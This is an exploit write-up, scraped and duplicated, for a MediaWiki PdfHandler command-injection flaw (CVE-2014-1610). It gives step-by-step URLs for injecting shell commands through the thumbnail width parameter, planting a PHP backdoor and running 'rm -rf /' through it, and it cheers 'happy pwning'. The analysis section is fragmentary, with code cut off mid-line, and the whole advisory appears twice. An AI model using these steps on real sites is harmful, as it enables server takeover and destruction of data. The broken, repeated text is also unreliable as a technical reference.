—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#
####################################################################
# Exploit:
####################################################################
1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
"images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20–no-preserve-root
4. happy pwning!!
# Related files:
####################################################################
thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php
# Vulnerability Analysis:
####################################################################
1. thumb.php
This script used to resize images if it is configured to be done
when the web browser requests the image
transform( $params, File::RENDER_NOW ); // << resize image
by width/height
...
// Stream the file if there were no errors
$thumb->streamFile( $headers );
…
?>
2. /includes/filerepo/file/File.php
getHandler(); // << PDF Handler
...
$normalisedParams = $params;
$handler->normaliseParams( $this, $normalisedParams );
…
$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
..
?>
3. /extensions/PdfHandler/PdfHandler_body.php
&1″;
…
$err = wfShellExec( $cmd, $retval );
…
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
Error generating thumbnail
Error generating thumbnail
เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found
convert: option requires an argument `-resize’ @
error/convert.c/ConvertImageCommand/2380.
GPL Ghostscript 9.10: Unrecoverable error, exit code 1
MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
####################################################################
#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610) # Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014) # Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014) # Affected website : Wikipedia.org and more ! # # Exploit author : Xelenonz & @u0x (Pichaya Morimoto) # Release dates : Feb 1, 2014 # Special Thanks to 2600 Thailand ! # #################################################################### # Exploit: #################################################################### 1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled) http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20 "images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20–no-preserve-root
4. happy pwning!!
# Related files:
####################################################################
thumb.php <-- extract all _GET array to params /extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options /includes/media/ImageHandler.php /includes/GlobalFunctions.php /includes/filerepo/file/File.php # Vulnerability Analysis: #################################################################### 1. thumb.php This script used to resize images if it is configured to be done when the web browser requests the image transform( $params, File::RENDER_NOW ); // << resize image by width/height ... // Stream the file if there were no errors $thumb->streamFile( $headers );
…
?>
2. /includes/filerepo/file/File.php
getHandler(); // << PDF Handler ... $normalisedParams = $params; $handler->normaliseParams( $this, $normalisedParams );
…
$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
..
?>
3. /extensions/PdfHandler/PdfHandler_body.php
&1″;
…
$err = wfShellExec( $cmd, $retval );
…
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
Error generating thumbnail
เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found
convert: option requires an argument `-resize’ @
error/convert.c/ConvertImageCommand/2380.
GPL Ghostscript 9.10: Unrecoverable error, exit code 1